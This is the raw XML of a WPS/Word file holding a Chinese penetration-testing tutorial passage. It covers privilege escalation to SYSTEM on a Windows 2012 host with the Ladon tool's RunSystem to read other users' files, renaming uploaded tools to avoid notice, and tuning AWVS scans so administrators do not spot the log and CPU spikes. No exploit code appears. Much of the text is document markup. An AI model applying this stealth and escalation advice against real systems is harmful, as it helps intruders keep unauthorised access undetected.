            <wp:effectExtent l="0" t="0" r="8890" b="11430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admin桌面上没什么有价值信息，我们继续看其它用户信息，发现onepc用户桌面上有个pwd.txt，访问，提示拒绝访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5133975" cy="5334000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0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直接上传Ladon40版本(Win2012默认为.net 4.0)，使用RunSystem提权至system,拿到最高权限后，就随意查看其它用户桌面文件了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/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186430"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13970"/>
            <wp:docPr id="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b/>
          <w:bCs/>
          <w:color w:val="E54C5E" w:themeColor="accent6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E54C5E" w:themeColor="accent6"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>PS：实战 文件不能放在桌面，且需改名后再上传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b/>
          <w:bCs/>
          <w:color w:val="EE822F" w:themeColor="accent2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent2"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>为什么不能乱扫？</w:t>
      </w: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拿AWVS为例 对本站进行扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5262880" cy="2245360"/>
            <wp:effectExtent l="0" t="0" r="1397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扫描时 目标服务器很卡 CPU使用率 直接100%，这种情况，但凡管理员登陆服务器，查看日志，或做其它操作，有可能被发现，要知道实战，机子上面可能还运行着其它程序，CPU被PHP进程占满，管理员肯定要看WEB日志啊。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4267200" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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 xml:space="preserve">再看一下 是哪个程序占用比较多  PHP进程 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="3940810"/>
            <wp:effectExtent l="0" t="0" r="5715" b="2540"/>
            <wp:docPr id="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产生28000+请求 还没扫完，产生的log日志都有100多M</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="3932555"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10795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没几分钟  GUI就扫出来了 果然效率高的还得是程序，浏览器上扫速度很慢，半小时才扫到SQL注入，除非一开始设定只扫SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3249930"/>
            <wp:effectExtent l="0" t="0" r="4445" b="7620"/>
            <wp:docPr id="5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半小时后扫出了SQL注入漏洞，因为它对每个页面都进行大量测试，所以扫了很久，优点是不放过存在漏洞的页面。实战和环境一样news.php存在漏洞，list.php不一定存在，所以要是你只是手工测试list.php，就会错过漏洞。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7325" cy="3049270"/>
            <wp:effectExtent l="0" t="0" r="9525" b="17780"/>
            <wp:docPr id="5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对每个页面请求进行测试扫描，优点是不错过漏洞点，缺点是产生大量请求日志，管理员要是查看的话，一眼就能看出有问题。比如很多目标，每天访问量可能1000都没有，WVS一扫，就3万+请求。一是从日志大小就能看出明显区别，比如每天日志大小增量才是5M不到，一扫描体积增加60M，错误日志增加100M，访问网站IP都不到100，来自某个IP就3万+，管理员再蠢也知道有人在搞。所以实战，我们最好对工具相关功能原理有一定了解，比如WVS它也可以设置只扫描特定类型漏洞，这样就能减少大量请求，动作稍微小一点，目标电脑不卡，影响不到业务，管理员可能不看，生存周期就长一点。WVS指定类型漏洞扫描如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4410075" cy="2095500"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="5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Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="仿宋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仿宋" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不管用什么工具，都要结合一下实战场景分析，该如何使用，而不是ALL IN，全都上。比如内网机器站点，由于只允许内网访问，这个部门才几十个人，它每天的访问量能有多少？一上来就无脑扫，如果没被发现，只能说明管理员平时不查看那台电脑日志。如果搞的是大站，每天访问量几百万、上千万的，你扫区区那一点可能没什么。所以老手是有针对性的做，目标有什么资产，我们研究什么漏洞，目标性质决定用什么手法，而不是采用入门时刚学的方法，不管什么目标，都全功能去扫。针对不同目标，要有一定判断，要思考一下，不是针对靶场，不是护网那种赶时间，只打几天只要证明漏洞可用或拿域管密码就得高分，哪怕刚拿到密码5分钟后权限就掉，别人都能拿到上万分。所以95%的护网文章，攻击手法都非常暴力，没有几篇和你说动作要小一点，因为人家不用思考控守这个问题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A00002EF" w:usb1="4000004B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A00002EF" w:usb1="4000004B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k0MGYzZDhiYTMxY2NiZThhNjZkZjZhYjAxN2QzYTkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="3CE11A90"/>
    <w:rsid w:val="005F021D"/>
    <w:rsid w:val="00D02803"/>
    <w:rsid w:val="00FE3D8B"/>
    <w:rsid w:val="01411C9D"/>
    <w:rsid w:val="01670659"/>
    <w:rsid w:val="017924A6"/>
    <w:rsid w:val="01DE3F79"/>
    <w:rsid w:val="021B4171"/>
    <w:rsid w:val="023E49AC"/>
    <w:rsid w:val="02E209F4"/>
    <w:rsid w:val="03451AAA"/>
    <w:rsid w:val="034A32CD"/>
    <w:rsid w:val="0386543D"/>
    <w:rsid w:val="039020C3"/>
    <w:rsid w:val="03A55B83"/>
    <w:rsid w:val="04160A34"/>
    <w:rsid w:val="048A751C"/>
    <w:rsid w:val="048B5BE2"/>
    <w:rsid w:val="04A55BFC"/>
    <w:rsid w:val="04CB65CE"/>
    <w:rsid w:val="05256F93"/>
    <w:rsid w:val="05A76A17"/>
    <w:rsid w:val="05B9677F"/>
    <w:rsid w:val="065D4DCD"/>
    <w:rsid w:val="06FA046B"/>
    <w:rsid w:val="070E2AFA"/>
    <w:rsid w:val="079A7590"/>
    <w:rsid w:val="07AD6C1A"/>
    <w:rsid w:val="08510EF1"/>
    <w:rsid w:val="090F2459"/>
    <w:rsid w:val="093E7FEB"/>
    <w:rsid w:val="09C91B1B"/>
    <w:rsid w:val="09E95BCC"/>
    <w:rsid w:val="0A046C6F"/>
    <w:rsid w:val="0A173338"/>
    <w:rsid w:val="0AB43380"/>
    <w:rsid w:val="0BE475CA"/>
    <w:rsid w:val="0C303605"/>
    <w:rsid w:val="0C572F55"/>
    <w:rsid w:val="0D2B22B2"/>
    <w:rsid w:val="0D744588"/>
    <w:rsid w:val="0E3834ED"/>
    <w:rsid w:val="0E570458"/>
    <w:rsid w:val="0E762787"/>
    <w:rsid w:val="0F7E7D86"/>
    <w:rsid w:val="0FBD342A"/>
    <w:rsid w:val="11560215"/>
    <w:rsid w:val="11660FE1"/>
    <w:rsid w:val="11C10EA9"/>
    <w:rsid w:val="11F36C21"/>
    <w:rsid w:val="122E65E4"/>
    <w:rsid w:val="124E6D7F"/>
    <w:rsid w:val="1293358D"/>
    <w:rsid w:val="12A16A58"/>
    <w:rsid w:val="13270AAD"/>
    <w:rsid w:val="132A027E"/>
    <w:rsid w:val="13712447"/>
    <w:rsid w:val="13785584"/>
    <w:rsid w:val="13DF3855"/>
    <w:rsid w:val="14072DAB"/>
    <w:rsid w:val="144F6089"/>
    <w:rsid w:val="14660473"/>
    <w:rsid w:val="147A7897"/>
    <w:rsid w:val="14BD76C0"/>
    <w:rsid w:val="14C37EE7"/>
    <w:rsid w:val="15362EDE"/>
    <w:rsid w:val="15CC55DD"/>
    <w:rsid w:val="16061A45"/>
    <w:rsid w:val="16322361"/>
    <w:rsid w:val="17457E73"/>
    <w:rsid w:val="17591007"/>
    <w:rsid w:val="177E40A9"/>
    <w:rsid w:val="17EE0DF9"/>
    <w:rsid w:val="18387919"/>
    <w:rsid w:val="18C47267"/>
    <w:rsid w:val="19AF6E7E"/>
    <w:rsid w:val="1A171FFA"/>
    <w:rsid w:val="1AD26F51"/>
    <w:rsid w:val="1AF645EC"/>
    <w:rsid w:val="1B136E85"/>
    <w:rsid w:val="1B635D88"/>
    <w:rsid w:val="1B9E2247"/>
    <w:rsid w:val="1C21418E"/>
    <w:rsid w:val="1C68091F"/>
    <w:rsid w:val="1C915C41"/>
    <w:rsid w:val="1C991CD8"/>
    <w:rsid w:val="1D045A6C"/>
    <w:rsid w:val="1D0E3B4E"/>
    <w:rsid w:val="1D61177E"/>
    <w:rsid w:val="1DBA4424"/>
    <w:rsid w:val="1DD21378"/>
    <w:rsid w:val="1E25276A"/>
    <w:rsid w:val="1E6155D3"/>
    <w:rsid w:val="1FFA386B"/>
    <w:rsid w:val="20064163"/>
    <w:rsid w:val="201900EE"/>
    <w:rsid w:val="205E16D8"/>
    <w:rsid w:val="20896E76"/>
    <w:rsid w:val="215562AA"/>
    <w:rsid w:val="21A61F66"/>
    <w:rsid w:val="21DC590C"/>
    <w:rsid w:val="21E12D74"/>
    <w:rsid w:val="21E43C56"/>
    <w:rsid w:val="21E912AA"/>
    <w:rsid w:val="223918D0"/>
    <w:rsid w:val="225260B0"/>
    <w:rsid w:val="22876C2C"/>
    <w:rsid w:val="2298124C"/>
    <w:rsid w:val="22FD7853"/>
    <w:rsid w:val="230E5862"/>
    <w:rsid w:val="231B7585"/>
    <w:rsid w:val="237530E0"/>
    <w:rsid w:val="23DE55F4"/>
    <w:rsid w:val="240C6CE5"/>
    <w:rsid w:val="24286AD0"/>
    <w:rsid w:val="25212895"/>
    <w:rsid w:val="25331E3C"/>
    <w:rsid w:val="25E51B61"/>
    <w:rsid w:val="262A7A97"/>
    <w:rsid w:val="266665EC"/>
    <w:rsid w:val="26B101D9"/>
    <w:rsid w:val="27862521"/>
    <w:rsid w:val="279369D8"/>
    <w:rsid w:val="28667C49"/>
    <w:rsid w:val="28C55974"/>
    <w:rsid w:val="2984482A"/>
    <w:rsid w:val="298F6ABA"/>
    <w:rsid w:val="29D97CF9"/>
    <w:rsid w:val="29EB2AFB"/>
    <w:rsid w:val="2A0B7849"/>
    <w:rsid w:val="2AEE21C8"/>
    <w:rsid w:val="2AF1274A"/>
    <w:rsid w:val="2AFE7D9D"/>
    <w:rsid w:val="2AFF595C"/>
    <w:rsid w:val="2B6620F7"/>
    <w:rsid w:val="2CC85254"/>
    <w:rsid w:val="2D077ECE"/>
    <w:rsid w:val="2D6A07AF"/>
    <w:rsid w:val="2E9D013C"/>
    <w:rsid w:val="2ED109FA"/>
    <w:rsid w:val="2F2B74F6"/>
    <w:rsid w:val="2F346DF5"/>
    <w:rsid w:val="2FFC6C60"/>
    <w:rsid w:val="302D090A"/>
    <w:rsid w:val="307A3E50"/>
    <w:rsid w:val="307C3629"/>
    <w:rsid w:val="308E2A2A"/>
    <w:rsid w:val="30C8531D"/>
    <w:rsid w:val="30F67D72"/>
    <w:rsid w:val="32062E26"/>
    <w:rsid w:val="32153C14"/>
    <w:rsid w:val="32B1064D"/>
    <w:rsid w:val="3362786D"/>
    <w:rsid w:val="33AE2747"/>
    <w:rsid w:val="33F74BAF"/>
    <w:rsid w:val="340E112B"/>
    <w:rsid w:val="344B1D30"/>
    <w:rsid w:val="34687D75"/>
    <w:rsid w:val="34AA297B"/>
    <w:rsid w:val="35611EC4"/>
    <w:rsid w:val="35702107"/>
    <w:rsid w:val="357723E0"/>
    <w:rsid w:val="359A60CE"/>
    <w:rsid w:val="35F90C77"/>
    <w:rsid w:val="36911387"/>
    <w:rsid w:val="36BB5C0B"/>
    <w:rsid w:val="36E30E09"/>
    <w:rsid w:val="376C62F5"/>
    <w:rsid w:val="384A4E91"/>
    <w:rsid w:val="386D6DD1"/>
    <w:rsid w:val="38882552"/>
    <w:rsid w:val="38AD40F6"/>
    <w:rsid w:val="39606E19"/>
    <w:rsid w:val="3A6E2244"/>
    <w:rsid w:val="3A75572F"/>
    <w:rsid w:val="3A8C552E"/>
    <w:rsid w:val="3A900B55"/>
    <w:rsid w:val="3AB67675"/>
    <w:rsid w:val="3B622338"/>
    <w:rsid w:val="3B7566C9"/>
    <w:rsid w:val="3BAB0D0E"/>
    <w:rsid w:val="3BB15FE3"/>
    <w:rsid w:val="3C3E73E9"/>
    <w:rsid w:val="3CD94A35"/>
    <w:rsid w:val="3CE11A90"/>
    <w:rsid w:val="3D124D7F"/>
    <w:rsid w:val="3D247E1E"/>
    <w:rsid w:val="3D255200"/>
    <w:rsid w:val="3D2B0360"/>
    <w:rsid w:val="3D941FD8"/>
    <w:rsid w:val="3DC44482"/>
    <w:rsid w:val="3DED0E17"/>
    <w:rsid w:val="3DF44588"/>
    <w:rsid w:val="3E1503E1"/>
    <w:rsid w:val="3E8B1D5F"/>
    <w:rsid w:val="3EA0108A"/>
    <w:rsid w:val="3EE240F3"/>
    <w:rsid w:val="3F1D6CB2"/>
    <w:rsid w:val="3F340649"/>
    <w:rsid w:val="3F62795A"/>
    <w:rsid w:val="3F812CD9"/>
    <w:rsid w:val="3FD64707"/>
    <w:rsid w:val="4024504D"/>
    <w:rsid w:val="404F74B5"/>
    <w:rsid w:val="409F1DB3"/>
    <w:rsid w:val="40BD6AF1"/>
    <w:rsid w:val="40D678DC"/>
    <w:rsid w:val="40F47DB5"/>
    <w:rsid w:val="413B5C01"/>
    <w:rsid w:val="41A5138A"/>
    <w:rsid w:val="423B3E8A"/>
    <w:rsid w:val="42680678"/>
    <w:rsid w:val="429607CF"/>
    <w:rsid w:val="429E4914"/>
    <w:rsid w:val="42CC5D1F"/>
    <w:rsid w:val="43160B7D"/>
    <w:rsid w:val="435F694D"/>
    <w:rsid w:val="43732F46"/>
    <w:rsid w:val="44236A08"/>
    <w:rsid w:val="459B566E"/>
    <w:rsid w:val="460A724A"/>
    <w:rsid w:val="46161277"/>
    <w:rsid w:val="464F5033"/>
    <w:rsid w:val="46930685"/>
    <w:rsid w:val="46F26C63"/>
    <w:rsid w:val="470A13AF"/>
    <w:rsid w:val="47526956"/>
    <w:rsid w:val="476369EB"/>
    <w:rsid w:val="484418FD"/>
    <w:rsid w:val="484A022A"/>
    <w:rsid w:val="4867241E"/>
    <w:rsid w:val="48AE6D76"/>
    <w:rsid w:val="493E5A23"/>
    <w:rsid w:val="49643A44"/>
    <w:rsid w:val="499F41EE"/>
    <w:rsid w:val="49BC684D"/>
    <w:rsid w:val="49E92AF7"/>
    <w:rsid w:val="4A3B6031"/>
    <w:rsid w:val="4A402D82"/>
    <w:rsid w:val="4A4636B4"/>
    <w:rsid w:val="4A6E0AF9"/>
    <w:rsid w:val="4A9072DE"/>
    <w:rsid w:val="4AC83D2D"/>
    <w:rsid w:val="4B0D6DAA"/>
    <w:rsid w:val="4B442F28"/>
    <w:rsid w:val="4B5A6600"/>
    <w:rsid w:val="4B7818BD"/>
    <w:rsid w:val="4B8C4A37"/>
    <w:rsid w:val="4BA85C18"/>
    <w:rsid w:val="4BB356F2"/>
    <w:rsid w:val="4BDF7A22"/>
    <w:rsid w:val="4BEC745B"/>
    <w:rsid w:val="4C3C7B3F"/>
    <w:rsid w:val="4C905C1F"/>
    <w:rsid w:val="4D0E4F45"/>
    <w:rsid w:val="4E28581D"/>
    <w:rsid w:val="4E5F2E14"/>
    <w:rsid w:val="4F7D6BB1"/>
    <w:rsid w:val="4FB54E8E"/>
    <w:rsid w:val="4FC472C9"/>
    <w:rsid w:val="4FD14D61"/>
    <w:rsid w:val="4FFB285C"/>
    <w:rsid w:val="4FFB6249"/>
    <w:rsid w:val="503F50F2"/>
    <w:rsid w:val="50926B25"/>
    <w:rsid w:val="50991AFD"/>
    <w:rsid w:val="50B33E3F"/>
    <w:rsid w:val="50ED4285"/>
    <w:rsid w:val="50F124B5"/>
    <w:rsid w:val="510B54D0"/>
    <w:rsid w:val="51DA324D"/>
    <w:rsid w:val="522733A1"/>
    <w:rsid w:val="52E5727D"/>
    <w:rsid w:val="530C2027"/>
    <w:rsid w:val="536E62DF"/>
    <w:rsid w:val="53BB502F"/>
    <w:rsid w:val="54194ED7"/>
    <w:rsid w:val="542C20DF"/>
    <w:rsid w:val="546921D9"/>
    <w:rsid w:val="546F5509"/>
    <w:rsid w:val="54AB125F"/>
    <w:rsid w:val="54C0102B"/>
    <w:rsid w:val="54F2623D"/>
    <w:rsid w:val="555C298C"/>
    <w:rsid w:val="559958C0"/>
    <w:rsid w:val="55A96449"/>
    <w:rsid w:val="55B300C2"/>
    <w:rsid w:val="55C27646"/>
    <w:rsid w:val="56A825A5"/>
    <w:rsid w:val="57704950"/>
    <w:rsid w:val="57BD3A86"/>
    <w:rsid w:val="58147CAC"/>
    <w:rsid w:val="58600FA9"/>
    <w:rsid w:val="586B4F13"/>
    <w:rsid w:val="58DA6D12"/>
    <w:rsid w:val="592B7E4D"/>
    <w:rsid w:val="59452A10"/>
    <w:rsid w:val="599C110E"/>
    <w:rsid w:val="59E0398B"/>
    <w:rsid w:val="59E9785B"/>
    <w:rsid w:val="5A0A16DA"/>
    <w:rsid w:val="5AA06535"/>
    <w:rsid w:val="5B0E0EE1"/>
    <w:rsid w:val="5C55131D"/>
    <w:rsid w:val="5C916731"/>
    <w:rsid w:val="5D237776"/>
    <w:rsid w:val="5D852D4C"/>
    <w:rsid w:val="5E516F75"/>
    <w:rsid w:val="5F1F0E01"/>
    <w:rsid w:val="5F242BCA"/>
    <w:rsid w:val="5FC367F9"/>
    <w:rsid w:val="5FD87319"/>
    <w:rsid w:val="603F5555"/>
    <w:rsid w:val="604D1FAD"/>
    <w:rsid w:val="607355F5"/>
    <w:rsid w:val="609F65A9"/>
    <w:rsid w:val="60A41202"/>
    <w:rsid w:val="60D84E80"/>
    <w:rsid w:val="60FA69A7"/>
    <w:rsid w:val="61063F84"/>
    <w:rsid w:val="620330FE"/>
    <w:rsid w:val="62483C5F"/>
    <w:rsid w:val="628103DC"/>
    <w:rsid w:val="632642A6"/>
    <w:rsid w:val="63277D59"/>
    <w:rsid w:val="63402A0B"/>
    <w:rsid w:val="63633DE9"/>
    <w:rsid w:val="63BE007A"/>
    <w:rsid w:val="64161E5C"/>
    <w:rsid w:val="64363FB1"/>
    <w:rsid w:val="646E1FAB"/>
    <w:rsid w:val="64BE438D"/>
    <w:rsid w:val="64ED10BC"/>
    <w:rsid w:val="65011004"/>
    <w:rsid w:val="65987EBF"/>
    <w:rsid w:val="65A94B44"/>
    <w:rsid w:val="65D6235A"/>
    <w:rsid w:val="667912A4"/>
    <w:rsid w:val="66846F11"/>
    <w:rsid w:val="66986BFD"/>
    <w:rsid w:val="67212208"/>
    <w:rsid w:val="67680587"/>
    <w:rsid w:val="69124F8D"/>
    <w:rsid w:val="69473E9F"/>
    <w:rsid w:val="6A0911E4"/>
    <w:rsid w:val="6A1956D3"/>
    <w:rsid w:val="6A362315"/>
    <w:rsid w:val="6AFF7355"/>
    <w:rsid w:val="6B493EAE"/>
    <w:rsid w:val="6C4038DA"/>
    <w:rsid w:val="6C89477F"/>
    <w:rsid w:val="6CE215BE"/>
    <w:rsid w:val="6D01750D"/>
    <w:rsid w:val="6D8B39AE"/>
    <w:rsid w:val="6DDD233F"/>
    <w:rsid w:val="6DE51A9C"/>
    <w:rsid w:val="6E276AFF"/>
    <w:rsid w:val="6EDC2772"/>
    <w:rsid w:val="6F041776"/>
    <w:rsid w:val="6F3D60A9"/>
    <w:rsid w:val="70590C59"/>
    <w:rsid w:val="70A77A0A"/>
    <w:rsid w:val="70BA2B7E"/>
    <w:rsid w:val="70BA4E5E"/>
    <w:rsid w:val="713203BE"/>
    <w:rsid w:val="71960501"/>
    <w:rsid w:val="72701EDF"/>
    <w:rsid w:val="73404861"/>
    <w:rsid w:val="739E15E1"/>
    <w:rsid w:val="73BE2557"/>
    <w:rsid w:val="73EC1AA2"/>
    <w:rsid w:val="74825C9C"/>
    <w:rsid w:val="74B34F97"/>
    <w:rsid w:val="74EC0775"/>
    <w:rsid w:val="75403855"/>
    <w:rsid w:val="7565090C"/>
    <w:rsid w:val="756D3991"/>
    <w:rsid w:val="75B45CD2"/>
    <w:rsid w:val="75E749AA"/>
    <w:rsid w:val="75EB2488"/>
    <w:rsid w:val="760426E8"/>
    <w:rsid w:val="768D21F1"/>
    <w:rsid w:val="76954A49"/>
    <w:rsid w:val="76E71FED"/>
    <w:rsid w:val="779836C9"/>
    <w:rsid w:val="78142A39"/>
    <w:rsid w:val="78427F94"/>
    <w:rsid w:val="791F1447"/>
    <w:rsid w:val="79AB4301"/>
    <w:rsid w:val="7A7C68C0"/>
    <w:rsid w:val="7AE742B8"/>
    <w:rsid w:val="7BB87930"/>
    <w:rsid w:val="7BEA5DA0"/>
    <w:rsid w:val="7BEF3231"/>
    <w:rsid w:val="7D2A396D"/>
    <w:rsid w:val="7D836108"/>
    <w:rsid w:val="7DC45891"/>
    <w:rsid w:val="7E1B50E0"/>
    <w:rsid w:val="7E4635AE"/>
    <w:rsid w:val="7F3F016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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml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46</Pages>
  <Words>0</Words>
  <Characters>0</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_10.1.0.5458_F1E327BC-269C-435d-A152-05C5408002CA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2025-02-24T16:42:00Z</dcterms:created>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>office</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-25T14:28:10Z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2052-10.1.0.5458</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>0D5168D5FD7A42DE9E97D737173987CE_11</vt:lpwstr>
  </property>
</Properties>
</file>